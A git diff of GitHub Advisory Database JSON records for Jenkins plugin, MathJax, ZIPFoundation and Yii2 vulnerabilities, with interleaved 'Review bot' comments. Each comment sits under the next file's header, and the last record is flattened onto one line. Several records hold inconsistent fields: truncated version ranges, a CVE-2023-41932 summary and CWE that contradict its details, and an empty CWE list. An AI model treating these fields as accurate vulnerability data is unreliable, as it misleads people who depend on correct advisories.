+ "github_reviewed_at": "2024-01-30T23:03:23Z",
+ "nvd_published_at": "2023-07-19T16:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/08/GHSA-c2cc-3569-6jh2/GHSA-c2cc-3569-6jh2.json b/advisories/github-reviewed/2023/08/GHSA-c2cc-3569-6jh2/GHSA-c2cc-3569-6jh2.json
index dc9768dc2d535..579cf8bdcf95e 100644
--- a/advisories/github-reviewed/2023/08/GHSA-c2cc-3569-6jh2/GHSA-c2cc-3569-6jh2.json
+++ b/advisories/github-reviewed/2023/08/GHSA-c2cc-3569-6jh2/GHSA-c2cc-3569-6jh2.json
@@ -28,11 +28,14 @@
 "introduced": "0"
 },
 {
- "last_affected": "0.9.16"
+ "fixed": "0.9.18"
 }
 ]
 }
- ]
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.9.17"
+ }
 }
 ],
 "references": [
@@ -52,6 +55,10 @@
 "type": "PACKAGE",
 "url": "https://github.com/weichsel/ZIPFoundation"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/weichsel/ZIPFoundation/releases/tag/0.9.18"
+ },
 {
 "type": "WEB",
 "url": "https://ostorlab.co/vulndb/advisory/OVE-2023-4"
diff --git a/advisories/github-reviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json b/advisories/github-reviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json
new file mode 100644
index 0000000000000..0b24dc8e38da3
--- /dev/null
+++ b/advisories/github-reviewed/2023/08/GHSA-v638-q856-grg8/GHSA-v638-q856-grg8.json
@@ -0,0 +1,57 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-v638-q856-grg8",
+ "modified": "2024-01-31T00:02:46Z",
+ "published": "2023-08-29T21:30:21Z",
+ "aliases": [
+ "CVE-2023-39663"
+ ],
+ "summary": "MathJax Regular expression Denial of Service (ReDoS)",
+ "details": "Mathjax up to v2.7.9 was discovered to contain two Regular expression Denial of Service (ReDoS) vulnerabilities in MathJax.js via the components pattern and markdownPattern. NOTE: the vendor disputes this because the regular expressions are not applied to user input; thus, there is no risk.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "mathjax"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "2.7.9"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39663"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/mathjax/MathJax/issues/3074"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1333"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-31T00:02:46Z",
+ "nvd_published_at": "2023-08-29T20:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json b/advisories/github-reviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json
new file mode 100644
index 0000000000000..79bb8a5f9f9d8
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-3vcr-579j-4x48/GHSA-3vcr-579j-4x48.json
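Review bot: The vendor dispute ("the regular expressions are not applied to user input; thus, there is no risk") is recorded only inside the `details` string, while `summary`, the CVSS vector (`A:H`) and `"severity": "HIGH"` present an uncontested ReDoS, so consumers that read only summary and severity will never see that the report is contested. Consider surfacing the dispute in the summary, or reconsidering the HIGH rating if the database agrees that no untrusted input reaches these patterns. The trailing `\n\n` in `details` also looks like a copy artifact.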
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3vcr-579j-4x48",
+ "modified": "2024-01-30T23:11:51Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41940"
+ ],
+ "summary": "Stored XSS vulnerability in Jenkins TAP Plugin",
+ "details": "Jenkins TAP Plugin 2.3 and earlier does not escape TAP file contents, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control TAP file contents.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.tap4j:tap"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "2.3"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41940"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3190"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:11:51Z",
+ "nvd_published_at": "2023-09-06T13:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json b/advisories/github-reviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json
new file mode 100644
index 0000000000000..e0602c18b7060
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-4gh2-m88h-8cj8/GHSA-4gh2-m88h-8cj8.json
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4gh2-m88h-8cj8",
+ "modified": "2024-01-30T23:07:24Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41939"
+ ],
+ "summary": "Disabled permissions can be granted by Jenkins SSH2 Easy Plugin",
+ "details": "Jenkins SSH2 Easy Plugin 1.4 and earlier does not verify that permissions configured to be granted are enabled, potentially allowing users formerly granted (typically optional permissions, like Overall/Manage) to access functionality they're no longer entitled to.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:ssh2easy"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.6"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41939"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3064"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-281"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:07:24Z",
+ "nvd_published_at": "2023-09-06T13:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json b/advisories/github-reviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json
new file mode 100644
index 0000000000000..c3cff2725c5cf
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-5jxp-f5rr-g6jc/GHSA-5jxp-f5rr-g6jc.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5jxp-f5rr-g6jc",
+ "modified": "2024-01-30T23:04:47Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41931"
+ ],
+ "summary": "XSS vulnerability in Jenkins Job Configuration History Plugin",
+ "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not property sanitize or escape the timestamp value from history entries when rendering a history entry on the history view, resulting in a stored cross-site scripting (XSS) vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:jobConfigHistory"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1229.v3039470161a_d"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1227.v7a"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41931"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3233"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:04:47Z",
+ "nvd_published_at": "2023-09-06T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json b/advisories/github-reviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json
new file mode 100644
index 0000000000000..175f8b223dc63
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-63vw-rprv-4f8j/GHSA-63vw-rprv-4f8j.json
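Review bot: `"last_known_affected_version_range": "<= 1227.v7a"` is a truncation of the version the `details` field names, `1227.v7a_79fc4dc01f` — the string is cut at the first underscore, whereas the `fixed` event `1229.v3039470161a_d` in the same record keeps its underscore, so this looks like an import artifact rather than intent. The same truncated value appears in GHSA-c7r5-cww9-64q6 and GHSA-cgh7-rgqg-hrcx in this commit. Suggest `"last_known_affected_version_range": "<= 1227.v7a_79fc4dc01f"` in all three; the details text also has a typo, `does not property sanitize` should read `does not properly sanitize`.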
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-63vw-rprv-4f8j",
+ "modified": "2024-01-30T23:05:03Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41938"
+ ],
+ "summary": "CSRF vulnerability in Jenkins Ivy Plugin",
+ "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Ivy Plugin 2.5 and earlier allows attackers to delete disabled modules.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:ivy"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "2.5"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41938"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3093"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:05:03Z",
+ "nvd_published_at": "2023-09-06T13:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-7cfq-72w2-24q4/GHSA-7cfq-72w2-24q4.json b/advisories/github-reviewed/2023/09/GHSA-7cfq-72w2-24q4/GHSA-7cfq-72w2-24q4.json
index 2392c2f3be08f..e52f05457d323 100644
--- a/advisories/github-reviewed/2023/09/GHSA-7cfq-72w2-24q4/GHSA-7cfq-72w2-24q4.json
+++ b/advisories/github-reviewed/2023/09/GHSA-7cfq-72w2-24q4/GHSA-7cfq-72w2-24q4.json
@@ -44,6 +44,10 @@
 "type": "WEB",
 "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2-dev/CVE-2015-5467.yaml"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2015-5467.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/yiisoft/yii2-framework"
@@ -51,6 +55,10 @@
 {
 "type": "WEB",
 "url": "https://www.yiiframework.com/news/87/yii-2-0-5-is-released-security-fix"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.yiiframework.com/news/87/yii-2-0-5-is-released-security-fix/"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json b/advisories/github-reviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json
new file mode 100644
index 0000000000000..f37349ab3cd3a
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-997j-37h7-mhg9/GHSA-997j-37h7-mhg9.json
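Review bot: The second hunk adds a reference that duplicates the existing entry directly above it, differing only by a trailing slash (`.../yii-2-0-5-is-released-security-fix` versus `.../yii-2-0-5-is-released-security-fix/`). Unless the database deliberately keeps both URL forms, the new entry should be dropped or should replace the old one rather than being listed alongside it, so consumers do not see the same source twice.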
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-997j-37h7-mhg9",
+ "modified": "2024-01-30T23:19:53Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41942"
+ ],
+ "summary": "CSRF vulnerability in Jenkins AWS CodeCommit Trigger Plugin",
+ "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier allows attackers to clear the SQS queue.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:aws-codecommit-trigger"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "3.0.12"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41942"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3101%20(2)"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:19:53Z",
+ "nvd_published_at": "2023-09-06T13:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json b/advisories/github-reviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json
new file mode 100644
index 0000000000000..5835ab7d9ecc5
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-9v8g-f9mq-739g/GHSA-9v8g-f9mq-739g.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9v8g-f9mq-739g",
+ "modified": "2024-01-30T23:11:07Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41934"
+ ],
+ "summary": "Improper masking of credentials in Jenkins Pipeline Maven Integration Plugin",
+ "details": "Jenkins Pipeline Maven Integration Plugin 1330.v18e473854496 and earlier does not properly mask (i.e., replace with asterisks) usernames of credentials specified in custom Maven settings in Pipeline build logs if \"Treat username as secret\" is checked.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:pipeline-maven"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1331.v003efa_fd6e81"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1330.v18e473854496"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41934"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3257"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:11:07Z",
+ "nvd_published_at": "2023-09-06T13:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json b/advisories/github-reviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json
new file mode 100644
index 0000000000000..0f8b190203c84
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-c7r5-cww9-64q6/GHSA-c7r5-cww9-64q6.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-c7r5-cww9-64q6",
+ "modified": "2024-01-30T23:12:08Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41930"
+ ],
+ "summary": "Path traversal in Jenkins Job Configuration History Plugin",
+ "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict the 'name' query parameter when rendering a history entry, allowing attackers to have Jenkins render a manipulated configuration history that was not created by the plugin.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:jobConfigHistory"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1229.v3039470161a_d"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1227.v7a"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41930"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3233"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:12:08Z",
+ "nvd_published_at": "2023-09-06T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json b/advisories/github-reviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json
new file mode 100644
index 0000000000000..09985e6a1b616
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-cgh7-rgqg-hrcx/GHSA-cgh7-rgqg-hrcx.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-cgh7-rgqg-hrcx",
+ "modified": "2024-01-30T23:11:19Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41932"
+ ],
+ "summary": "Path traversal allows exploiting XXE vulnerability in Jenkins Job Configuration History Plugin",
+ "details": "Jenkins Job Configuration History Plugin 1227.v7a_79fc4dc01f and earlier does not restrict 'timestamp' query parameters in multiple endpoints, allowing attackers with to delete attacker-specified directories on the Jenkins controller file system as long as they contain a file called 'history.xml'.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:jobConfigHistory"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1229.v3039470161a_d"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 1227.v7a"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41932"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3235"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-611"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:11:19Z",
+ "nvd_published_at": "2023-09-06T13:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json b/advisories/github-reviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json
new file mode 100644
index 0000000000000..ad6fdda190ad0
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-g4qf-5523-7wvf/GHSA-g4qf-5523-7wvf.json
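Review bot: The `details` sentence is broken — "allowing attackers with to delete attacker-specified directories" is missing the permission name after "with" — and what it describes (deletion of directories containing `history.xml`) does not agree with the `summary` ("Path traversal allows exploiting XXE vulnerability"), with `CWE-611`, or with a confidentiality-only CVSS vector (`C:H/I:N/A:N`). One of the two descriptions appears to belong to a different issue in the same plugin release; verify against the linked SECURITY-3235 entry and make summary, CWE, vector and details agree before merging. `"last_known_affected_version_range": "<= 1227.v7a"` is also truncated at the underscore relative to the version named in the details, `1227.v7a_79fc4dc01f`.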
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g4qf-5523-7wvf",
+ "modified": "2024-01-30T23:02:07Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41944"
+ ],
+ "summary": "HTML injection vulnerability in Jenkins AWS CodeCommit Trigger Plugin",
+ "details": "Jenkins AWS CodeCommit Trigger Plugin 3.0.12 and earlier does not escape the queue name parameter passed to a form validation URL, when rendering an error message, resulting in an HTML injection vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "org.jenkins-ci.plugins:aws-codecommit-trigger"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "3.0.12"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41944"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3102"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:02:07Z",
+ "nvd_published_at": "2023-09-06T13:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json b/advisories/github-reviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json
new file mode 100644
index 0000000000000..c682d29f31e44
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-g6rx-2w84-xmgj/GHSA-g6rx-2w84-xmgj.json
@@ -0,0 +1,61 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g6rx-2w84-xmgj",
+ "modified": "2024-01-30T23:00:57Z",
+ "published": "2023-09-06T15:30:26Z",
+ "aliases": [
+ "CVE-2023-41946"
+ ],
+ "summary": "CSRF vulnerability in Jenkins Frugal Testing Plugin",
+ "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Frugal Testing Plugin 1.1 and earlier allows attackers to connect to Frugal Testing using attacker-specified credentials, and to retrieve test IDs and names from Frugal Testing, if a valid credential corresponds to the attacker-specified username.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Maven",
+ "name": "io.jenkins.plugins:frugal-testing"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "last_affected": "1.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41946"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3082"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "LOW",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T23:00:57Z",
+ "nvd_published_at": "2023-09-06T13:15:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json b/advisories/github-reviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json
new file mode 100644
index 0000000000000..e1f2d87b4db17
--- /dev/null
+++ b/advisories/github-reviewed/2023/09/GHSA-hj7p-h74j-6gxj/GHSA-hj7p-h74j-6gxj.json
@@ -0,0 +1,83 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hj7p-h74j-6gxj", + "modified": "2024-01-30T23:10:45Z", + "published": "2023-09-06T15:30:26Z", + "aliases": [ + "CVE-2023-41935" + ], + "summary": "Non-constant time nonce comparison in Jenkins Microsoft Entra ID (previously Azure AD) Plugin", + "details": "Jenkins Azure AD Plugin 396.v86ce29279947 and earlier, except 378.380.v545b_1154b_3fb_, uses a non-constant time comparison function when checking whether the provided and expected CSRF protection nonce are equal, potentially allowing attackers to use statistical methods to obtain a valid nonce.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:azure-ad" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "378.380.v545b" + }, + { + "fixed": "397.v907382dd9b" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 396.v86ce29279947" + } + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:azure-ad" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "378.vd6e2874a" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41935" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2023-09-06/#SECURITY-3227" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2023/09/06/9" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-697" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:10:45Z", + "nvd_published_at": "2023-09-06T13:15:10Z" + } +} \ No newline at end of file 
